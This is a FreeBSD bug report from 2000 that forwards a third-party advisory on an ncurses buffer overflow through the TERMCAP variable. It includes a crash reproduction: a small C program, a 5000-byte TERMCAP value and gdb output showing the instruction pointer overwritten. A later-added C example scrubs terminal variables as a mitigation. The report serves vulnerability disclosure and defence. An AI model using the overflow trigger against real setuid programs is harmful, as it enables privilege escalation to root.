Date:      Tue, 25 Apr 2000 09:47:01 -0700 (PDT)
From:      smedina@idefense.com
To:        freebsd-gnats-submit@FreeBSD.org
Subject:   ports/18208: Reported Vulnerability in ncurses
Message-ID:  <200004251647.JAA91631@freefall.freebsd.org>


>Number:         18208
>Category:       ports
>Synopsis:       Reported Vulnerability in ncurses
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    freebsd-ports
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Tue Apr 25 09:50:01 PDT 2000
>Closed-Date:
>Last-Modified:
>Originator:     Servio F. Medina
>Release:        not my computer
>Organization:
iDefense
>Environment:
n/a
>Description:
The purpose of this email is twofold: 1) to inform you of a reported vulnerability by a third party, not myself, involving one of your products, and 2) to obtain confirmation/clarification and knowledge of any measures taken to address this in the event it is viable.

Below is the report (snipped):

--- Begin report ---
    b u f f e r 0 v e r f l 0 w   s e c u r i t y   a d v i s o r y   # 3


    Advisory Name: libncurses buffer overflow
             Date: 24/4/00
      Application: NCURSES 1.8.6 / FreeBSD 3.4-STABLE
           Vendor: FreeBSD Inc.
              WWW: www.freebsd.org
         Severity: setuid programs linked with libncurses
                   can be exploited to obtain root access.
           Author: venglin (venglin@freebsd.lublin.pl)
         Homepage: www.b0f.com

 * Vulnerable Versions

	- 3.4-STABLE  -- vulnerable
	- 4.0-STABLE  -- not tested (probably *not* vulnerable)
	- 5.0-CURRENT -- *not* vulnerable

 * The Problem

lubi:venglin:~> cat tescik.c
#include <ncurses.h>
main() { initscr(); }

lubi:venglin:~> cc -g -o te tescik.c -lncurses
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> gdb ./te
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(gdb) run
Starting program: /usr/home/venglin/./te

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *



--- End report ---


An explanation of my query - I work for Infrastructure Defense, Inc., which provides private publications to Fortune 500 companies about information/computer security trends, vulnerabilities, etc. I strive to contact the appropriate parties whenever there is a question as to the veracity of a post, claim, other. Hence, my email to you.

I hope to hear from you soon.


Servio Medina - smedina@idefense.com
Information Security Analyst
www.idefense.com 

>How-To-Repeat:
?
>Fix:
?

>Release-Note:
>Audit-Trail:
>Unformatted:
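A caller-side mitigation for the failure shown in the report, as an added example that is not part of the original message or of ncurses: a setuid program drops or length-checks terminal variables before it calls initscr(). The helper names and both size limits are assumptions of this example, and the check does not replace a fix in the library itself.

```c
#define _POSIX_C_SOURCE 200112L
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define TERM_ENV_MAX  1023  /* assumed cap; classic termcap buffers were 1024 bytes */
#define TERM_NAME_MAX 63    /* assumed cap for a terminal type name */

/* Variables that carry a terminal description or a path to one. */
static const char *const desc_vars[] = { "TERMCAP", "TERMINFO", "TERMPATH" };

/* Accept only a short terminal type name made of [A-Za-z0-9+._-]. */
static int term_name_ok(const char *v)
{
    size_t n = strlen(v);
    return n > 0 && n <= TERM_NAME_MAX && strspn(v,
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+._-") == n;
}

/* True when the process runs with more privilege than its invoker. */
int running_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Hypothetical helper, to be called before initscr(). A privileged program
 * drops every description variable; any program drops oversized ones.
 * Returns the number of variables removed from the environment. */
int scrub_term_env(int privileged)
{
    const char *v;
    int removed = 0;
    size_t i;

    for (i = 0; i < sizeof desc_vars / sizeof desc_vars[0]; i++) {
        v = getenv(desc_vars[i]);
        if (v != NULL && (privileged || strlen(v) > TERM_ENV_MAX)) {
            unsetenv(desc_vars[i]);
            removed++;
        }
    }
    v = getenv("TERM");
    if (v != NULL && !term_name_ok(v)) {
        unsetenv("TERM");
        removed++;
    }
    return removed;
}

int main(void) { scrub_term_env(running_privileged()); return 0; /* initscr() would follow the scrub */ }
```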

